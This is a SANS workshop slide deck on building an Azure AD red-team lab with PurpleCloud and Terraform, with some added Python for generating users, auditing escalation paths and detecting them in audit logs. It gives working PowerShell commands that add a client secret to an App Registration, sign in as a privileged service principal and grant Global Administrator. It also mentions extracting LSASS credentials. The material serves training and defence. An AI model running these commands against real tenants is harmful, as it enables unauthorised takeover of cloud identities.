Building An Azure AD Pentest Lab For Red Teams

SANS Webcast Building an Azure AD Pentest lab for Red Teams PDF file


SEC588 SANS Workshop Series

Building an Azure AD
Pentest lab for Red Teams

Jason Ostrom | Aaron Cure


Copyright 2022 SANS Institute | All Rights Reserved
Hey, what’s up. I’m Jason (He/Him)

• Builder of things @ SANS Institute
• Instructor, SEC588 → “Cloud Penetration Testing”
• Community tool contributor
• Family, hockey, football

New tool! Cloud “edge” bug bounty and recon tool: github.com/iknowjason/edge

SEC588 | Cloud Penetration Testing 2


Aaron

Principal Security Consultant
Author: https://amzn.to/3hXyNMA
SANS Instructor & Course Author
• SEC542: Web App Penetration Testing and Ethical Hacking
• SEC588: Cloud Penetration Testing
• SEC474: Building A Healthcare Security & Compliance Program
• DEV544: Secure Coding in .NET
Denver/Boulder OWASP Board Member
Certifications: CISSP, GCPN, GSSP.NET, GWAPT, GPEN, GMOB


Outline of today’s workshop

You will spin up your own Azure AD lab using automated tools to simulate a common cloud adoption use case

- Section 1: Setting up the Azure AD lab
- Section 2: Azure Manual Reconnaissance
- Section 3: Azure Privilege Escalation
- Section 4: Destroy Lab Resources

We will use Azure Cloud Shell with Bash + PowerShell combined with the SEC588 Slingshot Linux VM to cover the learning objectives.


Course Roadmap

• Day 1: Architecture, Discovery, and Recon
• Day 2: Attacking Identity Systems
• Day 3: Attacking and Abusing Cloud Services
• Day 4: Vulnerabilities in Cloud-Native Applications
• Day 5: Infrastructure Attacks and Red Teaming

Attacking Identity Systems
- Intro to Authentication
- Lab 2.1 Hunting For Keys
- Username Harvesting in the Cloud
- Username Harvesting Tools at Scale
- Lab 2.2 Finding Valid Users
- Passwords
- Lab 2.3 Password Attacks
- Open File Shares
- Lab 2.4 Hunting for Open File Shares
- Introduction to Microsoft Cloud Services
- Azure AD Authentication Standards
- App Consent and Microsoft Graph
- Lab 2.5 App Consent and Graph Lab


Infrastructure as code

Infrastructure as Code (IaC) - managing and provisioning infrastructure automated through code instead of manually.
• Configuration is code, stored in a VCS (GitHub, GitLab)
• Declarative, tracking desired state
• Benefits: Speed, consistency, repeatability, lower cost
• Each cloud provider has their own IaC service

IaC has many use cases for cloud deployments and DevOps. We can also use it for security use cases!


Terraform Overview

• Terraform - free, universal, and popular IaC tool that can manage infrastructure with declarative files
• Build, change, and version infrastructure in AWS, GCP, Azure
• Providers
  • plugins that talk to the API for different cloud providers
  • can provision Infrastructure, DNS, SaaS services, Kubernetes

Terraform can also be used to auto-provision resources in Identity solutions such as Azure Active Directory!


Terraform

Code is used to define, compare, and apply changes
• Multiple languages for configuration
  • Hashicorp Configuration Language (HCL)
  • Cloud Development Kit (CDK)
    • C#, Java, TypeScript, Go, Python
• Simple command line interface

$ terraform init
$ terraform plan
$ terraform apply

[Diagram: 1. Terraform CLI → 2. Terraform Provider (from the Terraform Registry) → 3. Target API (AWS, GCP, Azure, …)]


Tool Spotlight: PurpleCloud

• PurpleCloud is an open-source script that automates creation of an Azure Active Directory security lab
• Site: www.purplecloud.network
• Python code generator for terraform files in HCL format
• Random generator for Azure AD users, Groups, Apps
• New feature: Azure privilege escalation scenario!

Sister tool BlueCloud supports AWS! Github.com/iknowjason/BlueCloud


PurpleCloud: Additional features

• IaaS security lab creation (ad.py)
  • Create an IaaS Active Directory environment with Azure VMs
  • Automated Domain Join of Windows 10 Pro
  • Auto-login domain users for realistic simulations
  • Deploys a SIEM (Hunting ELK) and endpoints instrumented with Sysmon/Winlogbeat/Velociraptor/Atomic Red Team


PurpleCloud: New Security Lab Simulations

• Azure Sentinel (sentinel.py)
  • Ship Windows 10 Pro logs (Sysmon + Security) to Sentinel
  • AD environment with Domain Join + Azure Sentinel
• Azure Storage (storage.py)
• Azure Managed Identity (managed_identity.py)
• Phishing Application (phishing_app.py)


PurpleCloud: Basic Azure AD usage

• Command Line Options
  • --upn (The UPN suffix or Domain)
  • --count (Number of Azure AD users to create)
  • --apps (Number of Applications to create)
  • --groups (Number of Azure AD Groups to create)

% python3 azure_ad.py --upn <UPN> --count <Number Of users to create> --apps <Apps> --groups <Groups>


PurpleCloud Example Usage I

% python3 azure_ad.py --upn rtcfingroup.com --count 1000 --apps 3 --groups 5
[+] Number of users desired: 1000
[+] upn suffix: rtcfingroup.com
[+] Desired applications enabled: 3
[+] Desired groups enabled: 5
[+] Creating unique user list
[-] Duplicate user Matthew Wilson ~ not adding to users list
[-] Duplicate user John Patel ~ not adding to users list
[-] Duplicate user David Brown ~ not adding to users list
[-] Duplicate user Diane Adams ~ not adding to users list
[-] Duplicate user John Thompson ~ not adding to users list
[-] Duplicate user Matthew Cook ~ not adding to users list
[+] Number of users added into list: 1000
[+] Number of duplicate users filtered out: 6
[+] Creating output files for Azure AD Users
[+] Users csv file: azure_users.csv
[+] Username txt file: azure_usernames.txt
[+] Email addresses txt file: azure_emails.txt
[+] Terraform file: users.tf
[+] Creating terraform file: apps.tf
[+] Creating terraform file: groups.tf
[+] Adding all Azure users to this group: Users
%

Generate 1,000 random Azure AD users. Create 3 Azure AD applications. Create 5 Azure AD Groups and assign those users randomly into groups.

Automatically generate the terraform files.

Output three text files with Azure AD users, for usage with other security tools.
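As an added illustration of what the generator step above does (this is not PurpleCloud's own code): draw random users, drop repeats the way the "[-] Duplicate user" lines show, and render the users.tf HCL (azuread_user resources of the Terraform azuread provider) plus the text and CSV outputs. The name pools, the UPN suffix and the exact file layouts are constructed assumptions.

```python
# Added illustration, not PurpleCloud's own code: build a de-duplicated user
# list and render the users.tf / text / CSV outputs the run above lists.
# Name pools, UPN suffix and the exact file layouts are constructed assumptions.
import csv
import io
import random
import secrets
import string

FIRST_NAMES = ["Matthew", "John", "David", "Diane", "Sarah", "Emily"]
LAST_NAMES = ["Wilson", "Patel", "Brown", "Adams", "Thompson", "Cook"]
SYMBOLS = "!@#$%^&*"


def strong_password(length: int = 20) -> str:
    """Random password with upper, lower, digit and symbol (Azure AD complexity)."""
    alphabet = string.ascii_letters + string.digits + SYMBOLS
    while True:
        pw = "".join(secrets.choice(alphabet) for _ in range(length))
        if (any(c.islower() for c in pw) and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw) and any(c in SYMBOLS for c in pw)):
            return pw


def unique_users(count: int, upn_suffix: str, seed: int = 0):
    """Draw random first/last pairs, skipping repeats like the '[-] Duplicate user'
    lines in the PurpleCloud output. Returns (users, duplicates_filtered)."""
    if count > len(FIRST_NAMES) * len(LAST_NAMES):
        raise ValueError("name pools too small for the requested count")
    rng = random.Random(seed)            # seeded so a lab build is reproducible
    users, seen, duplicates = [], set(), 0
    while len(users) < count:
        first, last = rng.choice(FIRST_NAMES), rng.choice(LAST_NAMES)
        full = f"{first} {last}"
        if full in seen:
            duplicates += 1
            continue
        seen.add(full)
        upn = f"{first.lower()}.{last.lower()}@{upn_suffix}"
        users.append({"display_name": full, "upn": upn, "password": strong_password()})
    return users, duplicates


def render_users_tf(users) -> str:
    """One azuread_user resource per user (Terraform azuread provider schema)."""
    blocks = []
    for i, u in enumerate(users):
        blocks.append(
            f'resource "azuread_user" "user{i}" {{\n'
            f'  user_principal_name = "{u["upn"]}"\n'
            f'  display_name        = "{u["display_name"]}"\n'
            f'  password            = "{u["password"]}"\n'
            "}\n")
    return "\n".join(blocks)


def render_outputs(users) -> dict:
    """File name -> contents for users.tf and the three text/CSV artefacts."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["display_name", "upn", "password"])
    for u in users:
        writer.writerow([u["display_name"], u["upn"], u["password"]])
    return {
        "users.tf": render_users_tf(users),
        "azure_users.csv": buf.getvalue(),
        "azure_usernames.txt": "".join(u["upn"].split("@")[0] + "\n" for u in users),
        "azure_emails.txt": "".join(u["upn"] + "\n" for u in users),
    }
```

Because the CSV carries every generated password in clear text, treat it like any other credential file in the lab and delete it with the rest of the resources in Section IV.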


Outputs Files in Text and CSV for usage by other security tools



PurpleCloud Example Usage II

% python3 azure_ad.py -c 25 --upn rtcfingroup.com --apps 7 -aa -ga -pra
[+] Number of users desired: 25
[+] upn suffix: rtcfingroup.com
[+] Desired applications enabled: 7
[+] Creating unique user list
[+] Number of users added into list: 25
[+] Number of duplicate users filtered out: 0
[+] Creating output files for Azure AD Users
[+] Users csv file: azure_users.csv
[+] Username txt file: azure_usernames.txt
[+] Email addresses txt file: azure_emails.txt
[+] Terraform file: users.tf
[+] Creating terraform file: apps.tf
[+] Assigning the Privileged Role Administrator to HelpDesk_Application
[+] Assigning the Global Administrator role to ITOps_Application
%

Create a privilege escalation abuse vulnerable scenario with Azure AD applications and role assignments. One randomly selected Azure AD user is assigned into the Application Administrator role.


Simulate an On-Premise Active Directory Lab

Create an AD Domain with 500 AD users. Create three Windows 10 Professional endpoints, joining them to the domain.


Users Placed into OU and AD Groups automatically



Each Windows 10 Pro Endpoint has a custom Terraform file created (for further
editing if desired)



Virtual Machines Created



Active Directory Created with 3 Domain Joined Endpoints

500 Domain Users assigned into different OU and AD Groups.
Three Windows 10 Pro joined to the domain based on Python script.
Auto Logon Domain Users with AD credentials

With this feature, you can practice lateral movement across domain joined systems and extracting domain credentials from LSASS memory.


Passwords in AD default to Strong, but customizable

Default behavior is to auto-generate a strong password and assign it to all users, putting it into the CSV file.

Specify your desired password for all users via command line parameter.


Building Hunting ELK + Velociraptor with one endpoint



PurpleCloud Red Team Use Cases

• PurpleCloud: Automation for an Azure AD security lab
  • Create an Azure AD Lab mirroring customer tenant, to practice privilege escalation
  • App Consent phishing campaigns + Social Engineering
  • Create the lab with exact number of Azure AD users, to practice recon tooling, username enumeration, password spraying behavior
  • Blue teams to instrument Azure sign-in logs correctly + Detection Engineering + Purple Teaming exercises
  • R&D security research for new vulnerabilities or techniques

Terraform is increasingly used by Red Team Operators to build Red Team Infrastructure; DevOps for “Security as Code”. Now you can add an Azure AD Red Team Lab as an option!
Overview: Azure AD Background

• Azure AD Applications are an abstraction for Application Objects that allow some users to perform access operations on some data (OAuth 2.0)
• Service Principals and App Registrations are two services in Azure that work together to support Applications
• Service Principals in Azure can have RBAC Roles assigned to them.
• Service Principals log in to Azure with credentials (a Client Secret), just like regular users. If you steal a Service Principal credential, you can log in to Azure as that SP.


Overview: Azure AD Applications (I)

• A developer in your tenant creates an application
• An App Registration is the process of registering it in your tenant
  • Can be created as single tenant (only your tenant) or multi-tenant
• When that app is Registered, it is given a Client ID or Application ID that is globally unique within Azure
• The App Registration can be used to assign permissions to the App
• Defines 3 things:
  • How tokens are issued to access the application
  • Resources the application needs to access
  • Actions the application can take


Overview: Azure AD Service Principal

• When that app is registered in your tenant a Service Principal is created. Shows up in Azure → Enterprise Applications
• Service Principal is unique to your tenant; it’s a template of the application that is specific to your tenant
• Service Principal is an Application Identity that is used to authenticate users to the application and track/control consent for the app
• Enables core features such as authentication of the application during sign-in, and authorization during resource access.
• Defines what the app can do, who can access it, and what resources the app can access.


APPLICATION, APPLICATION OBJECT, SERVICE PRINCIPAL RELATIONSHIP

[Diagram: Application → 1 (and only 1) Application Object (resides in Azure AD) → Service Principal(s)]
Service Principal: Security Object that defines access to the app, resources, etc.


Example Azure Application: SSO with AWS and Azure as the Identity Provider

[Screenshot 1] Azure Administrator adds the AWS SSO application from the Gallery under Enterprise Applications by searching for it. It is added into the tenant.

[Screenshot 2] The Application now shows in your Tenant under Enterprise Applications. It has an Object ID unique to your Tenant. It has an Application ID that is shared with the App Registration.

[Screenshot 3] This is a view of the App Registration. It was automatically created when we added the Application through the Enterprise Applications Gallery.

A multi-tenant App is the basis for App Consent Phishing Attacks using an App Registered in Azure AD.


Company Background & Your Mission (I)

• Tecniqa: Fintech corporation embracing a multi-cloud strategy
  • Customer-facing solutions hosted in AWS
  • They use M365, On-premise AD DS
  • Executive push to start development of some new applications in Azure, taking advantage of Microsoft Identity platform
  • Development in Azure has run unchecked
• CISO has ordered a security review of the Azure AD tenant
• You are a Security Engineer reporting to the CISO
• Your mission is to look for vulnerabilities in the Azure AD tenant, starting with Azure users, groups, and applications
• Stand up an Azure AD lab replicating the configuration for Tecniqa.co
Company Background & Your Mission (II)

• In these labs we will be abusing Service Principal attack primitives for privilege escalation in Azure AD
• The lab creates 7 Azure AD Applications with some randomized RBAC role assignments


Section 1: Setting up the Azure AD Lab

Create Service Principal:
$ az ad sp create-for-rbac --role="Owner" --scopes="/subscriptions/SUBSCRIPTION_ID"

Assign Permissions:
1. Assign Global Administrator.
2. Assign permissions: Application.ReadWrite.All, User.ReadWrite.All, Group.ReadWrite.All

Set Environment Variables:
$ export ARM_CLIENT_ID=""; export ARM_CLIENT_SECRET=""; export ARM_TENANT_ID=""; export ARM_SUBSCRIPTION_ID=""

Run PurpleCloud:
$ python3 azure_ad.py -c 25 --upn YOUR_UPN --apps 7 -aa -ga -pra

Run terraform:
$ terraform init; terraform plan --out run.plan; terraform apply run.plan


Lab I: Lab Environment Setup

Please work on the lab exercise, Lab 1, found in your wiki.


Section II: Reconnaissance Overview (I)

• Command 1: Connect-AzureAD
• Summary: Connects with an authenticated Azure AD account to a tenant so that further Azure Active Directory cmdlets can be used.

PS /home/user> $username = ""
PS /home/user> $password = ""
PS /home/user> $securepassword = ConvertTo-SecureString "$password" -AsPlainText -Force
PS /home/user> $credential = New-Object System.Management.Automation.PSCredential($username, $securepassword)
PS /home/user> Connect-AzureAD -Credential $credential


Section II: Reconnaissance Overview (II)

• Command 2: Get-AzureADDirectoryRoleMember -ObjectId 9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3
• Summary: Get AAD members assigned into the Application Administrator role.

PS /home/user> $appadminObjectId = (Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Application Administrator'} | select ObjectId).ObjectId
PS /home/user> Get-AzureADDirectoryRoleMember -ObjectId $appadminObjectId

Get the ObjectID for Application Administrator and then query based on this ObjectID for assigned users.

Application Administrator is a highly privileged role within Azure Active Directory RBAC. Any user assigned into this role can manage and create all Enterprise Applications and App Registrations.


Section II: Reconnaissance Overview (III)

• Command 3: Get-AzureADDirectoryRoleMember -ObjectId e8611ab8-c189-46e8-94e1-60213ab1f814
• Summary: Get AAD members assigned into the Privileged Role Administrator role.

PS /home/user> $praObjectId = (Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Privileged Role Administrator'} | select ObjectId).ObjectId
PS /home/user> Get-AzureADDirectoryRoleMember -ObjectId $praObjectId

Get the ObjectID for Privileged Role Administrator and then query based on this ObjectID for assigned Service Principals.

Privileged Role Administrator is a highly privileged role within Azure Active Directory RBAC. A Service Principal assigned into this role can manage all role assignments, including assigning a user into the Global Administrator role.


Lab II: Azure Manual Reconnaissance

Please work on the lab exercise, Lab 2, found in your wiki.


Azure Privilege Escalation Overview

In this lab we are abusing a privilege escalation attack pathway. Tecniqa Developers have assigned themselves excessive privileges.

• Application Administrators can manage Enterprise Applications and App Registrations
  • Including adding a new App Registration client secret
• Privileged Role Administrators (PRA) can assign users to roles, including Global Administrator. If a Service Principal with PRA is found in the tenant, this is the attack pathway.

The Application Administrator can log in with the Service Principal of a PRA and assign their own user to Global Administrator.
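The Section II reconnaissance commands and the pathway above can be turned into a single tenant audit. As an added example (not from the workshop or PurpleCloud), the snippet below takes a directory snapshot in the shape of Graph directoryRole member objects, lists the service principals that hold a role able to grant Global Administrator, and pairs them with the Application Administrators who could add a client secret to their App Registration. Every name and ID in the snapshot is constructed; the role names are the real Azure AD role display names.

```python
# Added example, not from the workshop or PurpleCloud: audit a directory
# snapshot for the Application Administrator -> privileged Service Principal
# path. The snapshot is constructed in the shape of Graph directoryRole member
# objects; every name and ID below is made up.

ROLE_GRANTING_ROLES = {"Privileged Role Administrator", "Global Administrator"}
# Cloud Application Administrator has the same app-credential rights; it is a
# real role, but not one the workshop slides mention.
APP_ADMIN_ROLES = {"Application Administrator", "Cloud Application Administrator"}

SNAPSHOT = {
    # Role name -> members, as Get-AzureADDirectoryRoleMember would list them.
    "roles": {
        "Application Administrator": [
            {"@odata.type": "#microsoft.graph.user", "id": "u-1001",
             "userPrincipalName": "dev1@tecniqa.example"}],
        "Privileged Role Administrator": [
            {"@odata.type": "#microsoft.graph.servicePrincipal", "id": "sp-2001",
             "displayName": "HelpDesk_Application", "appId": "app-aaaa"}],
        "Global Administrator": [
            {"@odata.type": "#microsoft.graph.servicePrincipal", "id": "sp-2002",
             "displayName": "ITOps_Application", "appId": "app-bbbb"},
            {"@odata.type": "#microsoft.graph.user", "id": "u-0001",
             "userPrincipalName": "admin@tecniqa.example"}],
    },
    # App Registrations that live in this tenant, keyed by appId. These are the
    # objects an Application Administrator can add a new client secret to.
    "applications": {
        "app-aaaa": {"objectId": "obj-aaaa", "displayName": "HelpDesk_Application"},
        "app-bbbb": {"objectId": "obj-bbbb", "displayName": "ITOps_Application"},
    },
}


def privileged_service_principals(snapshot):
    """Service principals holding a role that can hand out Global Administrator."""
    found = []
    for role, members in snapshot["roles"].items():
        if role in ROLE_GRANTING_ROLES:
            for m in members:
                if m["@odata.type"] == "#microsoft.graph.servicePrincipal":
                    found.append({"role": role, **m})
    return found


def escalation_paths(snapshot):
    """Each (app-admin user, app registration, SP role) triple is a path: the
    user can add a secret to the registration, sign in as the SP, and grant GA."""
    app_admins = [m for role, ms in snapshot["roles"].items()
                  if role in APP_ADMIN_ROLES for m in ms
                  if m["@odata.type"] == "#microsoft.graph.user"]
    paths = []
    for sp in privileged_service_principals(snapshot):
        app = snapshot["applications"].get(sp["appId"])
        if app is None:   # no App Registration in this tenant; not covered by this check
            continue
        for user in app_admins:
            paths.append({"user": user["userPrincipalName"],
                          "app_registration": app["displayName"],
                          "app_object_id": app["objectId"],
                          "service_principal": sp["displayName"],
                          "sp_role": sp["role"]})
    return paths


if __name__ == "__main__":
    for p in escalation_paths(SNAPSHOT):
        print(f"[!] {p['user']} can add a secret to {p['app_registration']} "
              f"({p['app_object_id']}) and act as {p['service_principal']} [{p['sp_role']}]")
```

Each path reported is a candidate for removing the role-granting role from the service principal, or for restricting who may manage that App Registration; an empty result on the lab tenant is the expected state after remediation.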


Privilege Escalation Commands (I)

• Command 1: New-AzureADApplicationPasswordCredential
• Summary: Generate a new client secret for an App Registration based on its ObjectId.

PS /home/user> $AppKeyCred = New-AzureADApplicationPasswordCredential -ObjectId $targetObjectId

This cmdlet requires finding the ObjectID of the App Registration you wish to target for adding a credential.
The Application Administrator role can add new client secrets for any App Registration.


Privilege Escalation Commands (II)

• Command 2: Connect-AzAccount -ServicePrincipal
• Summary: Connect to Azure with a Service Principal for using cmdlets from the Az PowerShell modules.

PS /home/user> $secret = $AppKeyCred.value
PS /home/user> $azurePassword = ConvertTo-SecureString $secret -AsPlainText -Force
PS /home/user> $cred = New-Object System.Management.Automation.PSCredential($azureApplicationId, $azurePassword)
PS /home/user> Connect-AzAccount -Credential $cred -TenantId $tenantId -ServicePrincipal

Take the new client secret from the prior step. You also need the Tenant ID & Application ID of the Service Principal (username).


Privilege Escalation Commands (III)

• Command 3: Connect-AzureAD -AadAccessToken
• Summary: Generate a Graph Token and connect an AzureAD Account with the Token

PS /home/user> $context = [Microsoft.Azure.Commands.Common.Authentication.Abstractions.AzureRmProfileProvider]::Instance.Profile.DefaultContext
PS /home/user> $aadToken = [Microsoft.Azure.Commands.Common.Authentication.AzureSession]::Instance.AuthenticationFactory.Authenticate($context.Account, $context.Environment, $context.Tenant.id.ToString(), $null, [Microsoft.Azure.Commands.Common.Authentication.ShowDialog]::Never, $null, "https://graph.windows.net").AccessToken
PS /home/user> Connect-AzureAD -AadAccessToken $aadToken -AccountId $context.Account.Id -TenantId $context.tenant.Id


Privilege Escalation Commands (IV)

• Command 4: Add-AzureADDirectoryRoleMember
• Summary: Assign the role of Global Administrator to the user

PS /home/user> $gaRole = Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Global Administrator'} | select DisplayName, ObjectId, RoleTemplateId
PS /home/user> $gaObjectId = $gaRole.ObjectId
PS /home/user> Add-AzureADDirectoryRoleMember -RefObjectId $userobjectId -ObjectId $gaObjectId

Pass the Object ID of the Global Admin role and the user you are assigning the role to.
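The four commands above leave a characteristic trail in the Azure AD audit log, which is what a blue team instrumenting this lab should look for. As an added detection example (not from the workshop), the snippet below correlates constructed audit events: any role grant initiated by a service principal is flagged, and severity is raised when the grantee had added a client secret to that service principal's App Registration shortly before. The event shape is a simplified, constructed form of the audit-log schema; the two activity names are the real activityDisplayName values, while names, IDs and timestamps are made up.

```python
# Added detection example, not from the workshop: correlate Azure AD audit
# events for the secret-then-role-grant sequence. Events are constructed in a
# simplified form of the audit-log schema; names, IDs and times are made up.
from datetime import datetime, timedelta

SECRET_ADDED = "Update application – Certificates and secrets management"
ROLE_ADDED = "Add member to role"

EVENTS = [  # constructed sample, oldest first
    {"time": "2022-06-01T10:00:00Z", "activity": SECRET_ADDED,
     "initiator": {"type": "user", "name": "dev1@tecniqa.example"},
     "target": {"type": "Application", "name": "HelpDesk_Application"}},
    {"time": "2022-06-01T10:07:00Z", "activity": ROLE_ADDED,
     "initiator": {"type": "app", "name": "HelpDesk_Application"},
     "target": {"type": "User", "name": "dev1@tecniqa.example"},
     "role": "Global Administrator"},
    {"time": "2022-06-01T12:00:00Z", "activity": ROLE_ADDED,
     "initiator": {"type": "user", "name": "admin@tecniqa.example"},
     "target": {"type": "User", "name": "dev2@tecniqa.example"},
     "role": "Helpdesk Administrator"},
]


def parse_time(stamp: str) -> datetime:
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")


def detect(events, window=timedelta(hours=24)):
    """Alert on every role grant performed by a service principal (medium) and
    escalate to high when the grantee added a secret to that SP's app within
    the look-back window. Events must be sorted oldest first."""
    alerts = []
    for i, ev in enumerate(events):
        if ev["activity"] != ROLE_ADDED or ev["initiator"]["type"] != "app":
            continue
        sp_name = ev["initiator"]["name"]
        granted_at = parse_time(ev["time"])
        alert = {"severity": "medium", "service_principal": sp_name,
                 "granted_role": ev["role"], "grantee": ev["target"]["name"]}
        for prior in events[:i]:
            if (prior["activity"] == SECRET_ADDED
                    and prior["target"]["name"] == sp_name
                    and prior["initiator"]["name"] == ev["target"]["name"]
                    and granted_at - parse_time(prior["time"]) <= window):
                alert["severity"] = "high"
                alert["secret_added_by"] = prior["initiator"]["name"]
                alert["secret_added_at"] = prior["time"]
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```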


Lab III: Privilege Escalation Abuse

Please work on the lab exercise, Lab 3, found in your wiki.


Section IV: Destroy Lab Resources

It’s a good idea for security and avoiding extra charges to delete all of these lab resources if they aren’t being used.

Destroy via terraform:
$ terraform destroy --auto-approve

Delete the Application: Delete the “azure-cli-*” app used for Terraform in the Azure portal under “Azure Active Directory” → “App Registrations”

Delete Storage Account: Delete the Azure Storage Account used for Cloud Shell in the Azure Portal






Thank you for joining us today!

• That’s a wrap on our SANS Workshop on Building an Azure AD Pentest Lab for Red Teams!
• Consider joining the SANS Offensive Ops Discord server at tinyurl.com/oodiscord
• Find us on #sec588

Jason Ostrom: @securitypuck, jostrom@stora.io
Aaron Cure: @curea, aaron.cure@cypressdefense.com
